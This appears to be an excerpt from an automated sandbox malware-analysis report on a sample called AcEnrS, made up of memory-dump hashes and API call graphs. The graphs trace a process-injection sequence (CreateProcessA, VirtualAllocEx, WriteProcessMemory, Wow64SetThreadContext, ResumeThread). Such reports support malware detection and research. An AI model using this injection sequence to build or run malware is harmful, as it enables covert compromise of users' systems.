                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6dc518b4671da7b5383d804f72e8888c37adb77c947c0f6045496100c2106a19
                                                                                • Instruction ID: 06a932eb322f04739516d37ebf43aff6ab793aba508caf3d2ee38682cd22fa9e
                                                                                • Opcode Fuzzy Hash: 6dc518b4671da7b5383d804f72e8888c37adb77c947c0f6045496100c2106a19
                                                                                • Instruction Fuzzy Hash: E6F090329042589FCB519F69D848BEABFF5EF8D324F0580AAE608C7261D2314955CB51
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 71852146e247e6a64bdb5458262cb6b202115f15ae8d97327595669b2d1c76ea
                                                                                • Instruction ID: 3c04dcaf4a433a0f0967ae27c24b4124d5b519a7a0a2838f3d43e47d70baf651
                                                                                • Opcode Fuzzy Hash: 71852146e247e6a64bdb5458262cb6b202115f15ae8d97327595669b2d1c76ea
                                                                                • Instruction Fuzzy Hash: 8DE02031E54356CBCB01D7F09C500EEBB34DDD2111708455BC06537150EB34255AC352
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0849f80e0f0696c8ea3fc6cc0bc1362f8a41786017cd15b40bba462ff066a24d
                                                                                • Instruction ID: d50d5e1f3937603a6bcc6a65d8b7afcf1f5f13d740eefb567ef597712e3ca2de
                                                                                • Opcode Fuzzy Hash: 0849f80e0f0696c8ea3fc6cc0bc1362f8a41786017cd15b40bba462ff066a24d
                                                                                • Instruction Fuzzy Hash: 0FE08C3004835A4FCB0AEF79F8088987F3AFF822047218AE6C0464A06EDF78084AC720
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7dd0882d4a802af2d5592939cf88596a7d5ee092429af8a88d46b19d918769f4
                                                                                • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                • Opcode Fuzzy Hash: 7dd0882d4a802af2d5592939cf88596a7d5ee092429af8a88d46b19d918769f4
                                                                                • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                • Instruction ID: cfa23cea413b358a41966b9362d93f39a8d0671fe9be61638ad67664bac29760
                                                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                • Instruction Fuzzy Hash: 6EC08C3360C2282EE239104E7C40EA3BB8DC3C13B8B2102BBFB1CD3200AC429C8401F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 906b5f3c72a8f9ef1df05167b858e3bf1461113e633c28245163a4f9e12f0d99
                                                                                • Instruction ID: b08fa0b4b75a4f6ba8a52afb00ce256fb99444ac706ad42c0f0cf619f27b885a
                                                                                • Opcode Fuzzy Hash: 906b5f3c72a8f9ef1df05167b858e3bf1461113e633c28245163a4f9e12f0d99
                                                                                • Instruction Fuzzy Hash: 06D0673AB400189FCB149F98E8408DDFB76FB98221B448116E915A3265C6319925DB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 91fe8ce58040adde8324fae7b1a5ab05b5fa82c9c429b0663e355e7d2ec25707
                                                                                • Instruction ID: ab01067441ec53b21c36bc25bf722a0ecd06cff30ebb674cbd475f1461213d6f
                                                                                • Opcode Fuzzy Hash: 91fe8ce58040adde8324fae7b1a5ab05b5fa82c9c429b0663e355e7d2ec25707
                                                                                • Instruction Fuzzy Hash: 51C012310443294FC949FF66FD45955372EEB802047508A20940A0656DEF7858498790
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                • API String ID: 0-4015495023
                                                                                • Opcode ID: f5a12c3dc9ef6231729db2051856dfba16fd3273345e9c98c4987e01f90edc3b
                                                                                • Instruction ID: ce6d388519e881ac748efe52608aabeb23b443bdee08c24b476d9af9e00cfa5f
                                                                                • Opcode Fuzzy Hash: f5a12c3dc9ef6231729db2051856dfba16fd3273345e9c98c4987e01f90edc3b
                                                                                • Instruction Fuzzy Hash: 5A315E30D0421E8BEF658E6C89817AFBAA6BF84314F1440ADCA15A7395DB30CD85CB92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                • API String ID: 0-2351511683
                                                                                • Opcode ID: 841cb1b50b222ef05e637d4f26d3fd8d044cb88126145d158fbd3ac196f47291
                                                                                • Instruction ID: f23c508a1690f33856a387fb8e074db747992d6b4e25ae6a31573486372d8998
                                                                                • Opcode Fuzzy Hash: 841cb1b50b222ef05e637d4f26d3fd8d044cb88126145d158fbd3ac196f47291
                                                                                • Instruction Fuzzy Hash: FA01F2B17401088FD7248E2CC5819A737EAFFC8B68725846EE645CB375DA32DC41C740

                                                                                Execution Graph

                                                                                Execution Coverage:10.2%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:209
                                                                                Total number of Limit Nodes:10
                                                                                execution_graph 21748 9017c60 21749 9017deb 21748->21749 21751 9017c86 21748->21751 21751->21749 21752 90157a4 21751->21752 21753 9017ee0 PostMessageW 21752->21753 21754 9017f4c 21753->21754 21754->21751 21755 b4d690 DuplicateHandle 21756 b4d726 21755->21756 21757 b4d040 21758 b4d086 GetCurrentProcess 21757->21758 21760 b4d0d1 21758->21760 21761 b4d0d8 GetCurrentThread 21758->21761 21760->21761 21762 b4d115 GetCurrentProcess 21761->21762 21763 b4d10e 21761->21763 21764 b4d14b 21762->21764 21763->21762 21765 b4d173 GetCurrentThreadId 21764->21765 21766 b4d1a4 21765->21766 21767 9014dd7 21769 9014dc4 21767->21769 21768 9014f37 21769->21768 21772 90169f0 21769->21772 21789 9016a00 21769->21789 21773 9016a1a 21772->21773 21783 9016a3e 21773->21783 21806 9017144 21773->21806 21810 90177fb 21773->21810 21814 9016e98 21773->21814 21821 9017199 21773->21821 21826 9017279 21773->21826 21830 9017336 21773->21830 21835 9016f92 21773->21835 21840 90172b3 21773->21840 21845 9017571 21773->21845 21849 9016f2f 21773->21849 21854 901702d 21773->21854 21859 9016fcd 21773->21859 21864 90170ea 21773->21864 21872 9016f6b 21773->21872 21783->21768 21790 9016a1a 21789->21790 21791 9016a3e 21790->21791 21792 9017144 2 API calls 21790->21792 21793 9016f6b 4 API calls 21790->21793 21794 90170ea 4 API calls 21790->21794 21795 9016fcd 2 API calls 21790->21795 21796 901702d 2 API calls 21790->21796 21797 9016f2f 2 API calls 21790->21797 21798 9017571 2 API calls 21790->21798 21799 90172b3 2 API calls 21790->21799 21800 9016f92 2 API calls 21790->21800 21801 9017336 2 API calls 21790->21801 21802 9017279 2 API calls 21790->21802 21803 9017199 2 API calls 21790->21803 21804 9016e98 4 API calls 21790->21804 21805 90177fb 2 API calls 21790->21805 21791->21768 21792->21791 21793->21791 21794->21791 21795->21791 21796->21791 21797->21791 21798->21791 21799->21791 21800->21791 21801->21791 21802->21791 21803->21791 21804->21791 21805->21791 21881 9014582 21806->21881 21885 9014588 21806->21885 21807 9017163 21807->21783 21889 9014810 21810->21889 21893 9014808 21810->21893 21811 901781d 21897 90149a8 21814->21897 21901 901499d 21814->21901 21823 9016f17 21821->21823 21822 90173f7 21822->21783 21823->21822 21905 9014660 21823->21905 21909 9014659 21823->21909 21828 9014582 Wow64SetThreadContext 21826->21828 21829 9014588 Wow64SetThreadContext 21826->21829 21827 9017293 21827->21783 21828->21827 21829->21827 21831 90175b1 21830->21831 21913 9014720 21831->21913 21917 9014719 21831->21917 21832 90175f5 21832->21783 21836 9016f0e 21835->21836 21837 90173f7 21836->21837 21838 9014660 VirtualAllocEx 21836->21838 21839 9014659 VirtualAllocEx 21836->21839 21837->21783 21838->21836 21839->21836 21841 9017278 21840->21841 21842 9017293 21840->21842 21843 9014582 Wow64SetThreadContext 21841->21843 21844 9014588 Wow64SetThreadContext 21841->21844 21842->21783 21843->21842 21844->21842 21847 9014720 WriteProcessMemory 21845->21847 21848 9014719 WriteProcessMemory 21845->21848 21846 9017552 21847->21846 21848->21846 21850 9016f17 21849->21850 21850->21849 21851 90173f7 21850->21851 21852 9014660 VirtualAllocEx 21850->21852 21853 9014659 VirtualAllocEx 21850->21853 21851->21783 21852->21850 21853->21850 21855 9016ff3 21854->21855 21856 9016ffb 21854->21856 21857 9014720 WriteProcessMemory 21855->21857 21858 9014719 WriteProcessMemory 21855->21858 21856->21783 21857->21856 21858->21856 21860 9016ff3 21859->21860 21862 9014720 WriteProcessMemory 21860->21862 21863 9014719 WriteProcessMemory 21860->21863 21861 9016ffb 21861->21783 21862->21861 21863->21861 21865 90170f0 21864->21865 21921 90144d3 21865->21921 21925 90144d8 21865->21925 21866 9016f17 21867 90173f7 21866->21867 21870 9014660 VirtualAllocEx 21866->21870 21871 9014659 VirtualAllocEx 21866->21871 21867->21783 21867->21867 21870->21866 21871->21866 21873 9016f80 21872->21873 21874 9017272 21873->21874 21879 90144d3 ResumeThread 21873->21879 21880 90144d8 ResumeThread 21873->21880 21874->21783 21875 9016f17 21876 90173f7 21875->21876 21877 9014660 VirtualAllocEx 21875->21877 21878 9014659 VirtualAllocEx 21875->21878 21876->21783 21877->21875 21878->21875 21879->21875 21880->21875 21882 90145cd Wow64SetThreadContext 21881->21882 21884 9014615 21882->21884 21884->21807 21886 90145cd Wow64SetThreadContext 21885->21886 21888 9014615 21886->21888 21888->21807 21890 901485b ReadProcessMemory 21889->21890 21892 901489f 21890->21892 21892->21811 21894 901485b ReadProcessMemory 21893->21894 21896 901489f 21894->21896 21896->21811 21898 9014a31 CreateProcessA 21897->21898 21900 9014bf3 21898->21900 21900->21900 21902 9014a31 CreateProcessA 21901->21902 21904 9014bf3 21902->21904 21904->21904 21906 90146a0 VirtualAllocEx 21905->21906 21908 90146dd 21906->21908 21908->21823 21910 90146a0 VirtualAllocEx 21909->21910 21912 90146dd 21910->21912 21912->21823 21914 9014768 WriteProcessMemory 21913->21914 21916 90147bf 21914->21916 21916->21832 21918 9014768 WriteProcessMemory 21917->21918 21920 90147bf 21918->21920 21920->21832 21922 9014518 ResumeThread 21921->21922 21924 9014549 21922->21924 21924->21866 21926 9014518 ResumeThread 21925->21926 21928 9014549 21926->21928 21928->21866 21929 9014e9b 21931 9014dc4 21929->21931 21930 9014f37 21930->21930 21931->21930 21932 90169f0 12 API calls 21931->21932 21933 9016a00 12 API calls 21931->21933 21932->21930 21933->21930 21934 9014efb 21935 9014dc4 21934->21935 21936 9014f37 21935->21936 21937 90169f0 12 API calls 21935->21937 21938 9016a00 12 API calls 21935->21938 21937->21936 21938->21936 21939 b44668 21940 b4467a 21939->21940 21941 b44686 21940->21941 21945 b44778 21940->21945 21950 b43e40 21941->21950 21943 b446a5 21946 b4479d 21945->21946 21954 b44888 21946->21954 21958 b44879 21946->21958 21951 b43e4b 21950->21951 21966 b45c4c 21951->21966 21953 b47052 21953->21943 21956 b448af 21954->21956 21955 b4498c 21955->21955 21956->21955 21962 b444c4 21956->21962 21960 b448af 21958->21960 21959 b4498c 21959->21959 21960->21959 21961 b444c4 CreateActCtxA 21960->21961 21961->21959 21963 b45918 CreateActCtxA 21962->21963 21965 b459db 21963->21965 21965->21965 21967 b45c57 21966->21967 21970 b45c6c 21967->21970 21969 b470fd 21969->21953 21971 b45c77 21970->21971 21974 b45c9c 21971->21974 21973 b471da 21973->21969 21975 b45ca7 21974->21975 21978 b45ccc 21975->21978 21977 b472cd 21977->21973 21979 b45cd7 21978->21979 21981 b485cb 21979->21981 21984 b4ac78 21979->21984 21980 b48609 21980->21977 21981->21980 21988 b4cd69 21981->21988 21992 b4acb0 21984->21992 21996 b4aca0 21984->21996 21985 b4ac8e 21985->21981 21989 b4cd99 21988->21989 21990 b4cdbd 21989->21990 22011 b4cf28 21989->22011 21990->21980 22001 b4ad97 21992->22001 22006 b4ada8 21992->22006 21993 b4acbf 21993->21985 21997 b4acb0 21996->21997 21999 b4ad97 GetModuleHandleW 21997->21999 22000 b4ada8 GetModuleHandleW 21997->22000 21998 b4acbf 21998->21985 21999->21998 22000->21998 22002 b4addc 22001->22002 22003 b4adb9 22001->22003 22002->21993 22003->22002 22004 b4afe0 GetModuleHandleW 22003->22004 22005 b4b00d 22004->22005 22005->21993 22007 b4addc 22006->22007 22008 b4adb9 22006->22008 22007->21993 22008->22007 22009 b4afe0 GetModuleHandleW 22008->22009 22010 b4b00d 22009->22010 22010->21993 22013 b4cf35 22011->22013 22012 b4cf6f 22012->21990 22013->22012 22015 b4bae0 22013->22015 22016 b4baeb 22015->22016 22018 b4dc88 22016->22018 22019 b4d2dc 22016->22019 22018->22018 22020 b4d2e7 22019->22020 22021 b45ccc 2 API calls 22020->22021 22022 b4dcf7 22021->22022 22022->22018

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 294 b4d030-b4d0cf GetCurrentProcess 298 b4d0d1-b4d0d7 294->298 299 b4d0d8-b4d10c GetCurrentThread 294->299 298->299 300 b4d115-b4d149 GetCurrentProcess 299->300 301 b4d10e-b4d114 299->301 303 b4d152-b4d16d call b4d618 300->303 304 b4d14b-b4d151 300->304 301->300 307 b4d173-b4d1a2 GetCurrentThreadId 303->307 304->303 308 b4d1a4-b4d1aa 307->308 309 b4d1ab-b4d20d 307->309 308->309
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00B4D0BE
                                                                                • GetCurrentThread.KERNEL32 ref: 00B4D0FB
                                                                                • GetCurrentProcess.KERNEL32 ref: 00B4D138
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00B4D191
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 3e34bd6ab27c53f36956c5a079b8edebed54d85ace7d82d0e8ba5c525c35a097
                                                                                • Instruction ID: 1fee76975366d47f4178a35e1ed93262cfcac6be72fb1b346f821782adac5b1b
                                                                                • Opcode Fuzzy Hash: 3e34bd6ab27c53f36956c5a079b8edebed54d85ace7d82d0e8ba5c525c35a097
                                                                                • Instruction Fuzzy Hash: D75167B09003498FDB54DFA9D588BEEBFF1EF48304F2484A9D409A7361C738A985CB65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 316 b4d040-b4d0cf GetCurrentProcess 320 b4d0d1-b4d0d7 316->320 321 b4d0d8-b4d10c GetCurrentThread 316->321 320->321 322 b4d115-b4d149 GetCurrentProcess 321->322 323 b4d10e-b4d114 321->323 325 b4d152-b4d16d call b4d618 322->325 326 b4d14b-b4d151 322->326 323->322 329 b4d173-b4d1a2 GetCurrentThreadId 325->329 326->325 330 b4d1a4-b4d1aa 329->330 331 b4d1ab-b4d20d 329->331 330->331
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00B4D0BE
                                                                                • GetCurrentThread.KERNEL32 ref: 00B4D0FB
                                                                                • GetCurrentProcess.KERNEL32 ref: 00B4D138
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00B4D191
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: cd494237be2bcafd28add492a763efd74dc99e144c8a99a626374fea9ab09f72
                                                                                • Instruction ID: 4172e6ca10081b54130dc2d5812ebbf612163f050ddcb58b92b0d77a97316120
                                                                                • Opcode Fuzzy Hash: cd494237be2bcafd28add492a763efd74dc99e144c8a99a626374fea9ab09f72
                                                                                • Instruction Fuzzy Hash: 215165B09003498FDB54EFA9D548BEEBBF1EF48304F208469E409A7360D738A984CB65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 360 901499d-9014a3d 362 9014a76-9014a96 360->362 363 9014a3f-9014a49 360->363 368 9014a98-9014aa2 362->368 369 9014acf-9014afe 362->369 363->362 364 9014a4b-9014a4d 363->364 366 9014a70-9014a73 364->366 367 9014a4f-9014a59 364->367 366->362 370 9014a5b 367->370 371 9014a5d-9014a6c 367->371 368->369 372 9014aa4-9014aa6 368->372 379 9014b00-9014b0a 369->379 380 9014b37-9014bf1 CreateProcessA 369->380 370->371 371->371 373 9014a6e 371->373 374 9014ac9-9014acc 372->374 375 9014aa8-9014ab2 372->375 373->366 374->369 377 9014ab4 375->377 378 9014ab6-9014ac5 375->378 377->378 378->378 381 9014ac7 378->381 379->380 382 9014b0c-9014b0e 379->382 391 9014bf3-9014bf9 380->391 392 9014bfa-9014c80 380->392 381->374 384 9014b31-9014b34 382->384 385 9014b10-9014b1a 382->385 384->380 386 9014b1c 385->386 387 9014b1e-9014b2d 385->387 386->387 387->387 388 9014b2f 387->388 388->384 391->392 402 9014c90-9014c94 392->402 403 9014c82-9014c86 392->403 404 9014ca4-9014ca8 402->404 405 9014c96-9014c9a 402->405 403->402 406 9014c88 403->406 408 9014cb8-9014cbc 404->408 409 9014caa-9014cae 404->409 405->404 407 9014c9c 405->407 406->402 407->404 411 9014cce-9014cd5 408->411 412 9014cbe-9014cc4 408->412 409->408 410 9014cb0 409->410 410->408 413 9014cd7-9014ce6 411->413 414 9014cec 411->414 412->411 413->414 415 9014ced 414->415 415->415
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09014BDE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: a207714b4fe4b35542b6050465128917f8424b737be71f7b2efc86b03c4ba9a4
                                                                                • Instruction ID: 3acb1a8c8fc26550da60bcbd945b1eed2c520b8f26a209958363cb1cbe04e4e8
                                                                                • Opcode Fuzzy Hash: a207714b4fe4b35542b6050465128917f8424b737be71f7b2efc86b03c4ba9a4
                                                                                • Instruction Fuzzy Hash: 98913871D00219CFDB64CFA8C8817EDBBF2BF48314F1585AAE819A7260DB749985CF91

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 417 90149a8-9014a3d 419 9014a76-9014a96 417->419 420 9014a3f-9014a49 417->420 425 9014a98-9014aa2 419->425 426 9014acf-9014afe 419->426 420->419 421 9014a4b-9014a4d 420->421 423 9014a70-9014a73 421->423 424 9014a4f-9014a59 421->424 423->419 427 9014a5b 424->427 428 9014a5d-9014a6c 424->428 425->426 429 9014aa4-9014aa6 425->429 436 9014b00-9014b0a 426->436 437 9014b37-9014bf1 CreateProcessA 426->437 427->428 428->428 430 9014a6e 428->430 431 9014ac9-9014acc 429->431 432 9014aa8-9014ab2 429->432 430->423 431->426 434 9014ab4 432->434 435 9014ab6-9014ac5 432->435 434->435 435->435 438 9014ac7 435->438 436->437 439 9014b0c-9014b0e 436->439 448 9014bf3-9014bf9 437->448 449 9014bfa-9014c80 437->449 438->431 441 9014b31-9014b34 439->441 442 9014b10-9014b1a 439->442 441->437 443 9014b1c 442->443 444 9014b1e-9014b2d 442->444 443->444 444->444 445 9014b2f 444->445 445->441 448->449 459 9014c90-9014c94 449->459 460 9014c82-9014c86 449->460 461 9014ca4-9014ca8 459->461 462 9014c96-9014c9a 459->462 460->459 463 9014c88 460->463 465 9014cb8-9014cbc 461->465 466 9014caa-9014cae 461->466 462->461 464 9014c9c 462->464 463->459 464->461 468 9014cce-9014cd5 465->468 469 9014cbe-9014cc4 465->469 466->465 467 9014cb0 466->467 467->465 470 9014cd7-9014ce6 468->470 471 9014cec 468->471 469->468 470->471 472 9014ced 471->472 472->472
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09014BDE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 14a69921f7c2bb041ec974b86d352c3f72e971ffcc2a0c830d09f3ee190fb5db
                                                                                • Instruction ID: 4a628edf84ae0209d6505a99cf414ce97b46fb4da11f5b2f95843a8312d7261b
                                                                                • Opcode Fuzzy Hash: 14a69921f7c2bb041ec974b86d352c3f72e971ffcc2a0c830d09f3ee190fb5db
                                                                                • Instruction Fuzzy Hash: C0914771D00219CFDB64CFA8C881BADBBF2FF48314F1585A9E819A7260DB749985CF91

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 474 b4ada8-b4adb7 475 b4ade3-b4ade7 474->475 476 b4adb9-b4adc6 call b4a0cc 474->476 478 b4ade9-b4adf3 475->478 479 b4adfb-b4ae3c 475->479 482 b4addc 476->482 483 b4adc8 476->483 478->479 485 b4ae3e-b4ae46 479->485 486 b4ae49-b4ae57 479->486 482->475 529 b4adce call b4b040 483->529 530 b4adce call b4b031 483->530 485->486 487 b4ae59-b4ae5e 486->487 488 b4ae7b-b4ae7d 486->488 490 b4ae60-b4ae67 call b4a0d8 487->490 491 b4ae69 487->491 493 b4ae80-b4ae87 488->493 489 b4add4-b4add6 489->482 492 b4af18-b4afd8 489->492 495 b4ae6b-b4ae79 490->495 491->495 524 b4afe0-b4b00b GetModuleHandleW 492->524 525 b4afda-b4afdd 492->525 496 b4ae94-b4ae9b 493->496 497 b4ae89-b4ae91 493->497 495->493 500 b4ae9d-b4aea5 496->500 501 b4aea8-b4aeaa call b4a0e8 496->501 497->496 500->501 503 b4aeaf-b4aeb1 501->503 505 b4aeb3-b4aebb 503->505 506 b4aebe-b4aec3 503->506 505->506 507 b4aec5-b4aecc 506->507 508 b4aee1-b4aeee 506->508 507->508 510 b4aece-b4aede call b4a0f8 call b4a108 507->510 515 b4aef0-b4af0e 508->515 516 b4af11-b4af17 508->516 510->508 515->516 526 b4b014-b4b028 524->526 527 b4b00d-b4b013 524->527 525->524 527->526 529->489 530->489
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00B4AFFE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: e071d770c7c6261c374194bdd9fe09fc1903ea67712ab9d94db073d559c68f21
                                                                                • Instruction ID: 68c3c24a172bb0ed014f352e7e6a105f47b917a63921ba40cb70343050d8ae0f
                                                                                • Opcode Fuzzy Hash: e071d770c7c6261c374194bdd9fe09fc1903ea67712ab9d94db073d559c68f21
                                                                                • Instruction Fuzzy Hash: 83716470A00B049FD724DF29D44079ABBF1FF88304F108A6DE49AD7A40DB75EA49CB91

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 531 b45a84-b45b14
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 593612cad7a9acc6cf32cdb856d27c4a41ef1485db98c5e51b779f056480510a
                                                                                • Instruction ID: 888580e78af82483822e2b4fd59e60e768180d3343e05a5ee8941a3e38671d34
                                                                                • Opcode Fuzzy Hash: 593612cad7a9acc6cf32cdb856d27c4a41ef1485db98c5e51b779f056480510a
                                                                                • Instruction Fuzzy Hash: 7D31BE71804B49CFDF21CFA8C8857EDBBF0EF56314F14829AC019AB252C775AA4ADB51

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 534 b4590c-b4598c 535 b4598f-b459d9 CreateActCtxA 534->535 537 b459e2-b45a3c 535->537 538 b459db-b459e1 535->538 545 b45a3e-b45a41 537->545 546 b45a4b-b45a4f 537->546 538->537 545->546 547 b45a60 546->547 548 b45a51-b45a5d 546->548 549 b45a61 547->549 548->547 549->549
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00B459C9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: a6d3f71069ad5298402a7db83cc2cd5d5a0f8341948f0f3977525d378e8d6347
                                                                                • Instruction ID: 18d6329150a30868673c9666bb4d67b02f4a59cc359c4c382b845282daae45d9
                                                                                • Opcode Fuzzy Hash: a6d3f71069ad5298402a7db83cc2cd5d5a0f8341948f0f3977525d378e8d6347
                                                                                • Instruction Fuzzy Hash: CA41CFB0C00B19CBDB24DFA9C884B9DBBF5BF49304F20816AD418AB255DB75694ACF91

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 551 b444c4-b459d9 CreateActCtxA 555 b459e2-b45a3c 551->555 556 b459db-b459e1 551->556 563 b45a3e-b45a41 555->563 564 b45a4b-b45a4f 555->564 556->555 563->564 565 b45a60 564->565 566 b45a51-b45a5d 564->566 567 b45a61 565->567 566->565 567->567
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00B459C9
                                                                                Memory Dump Source
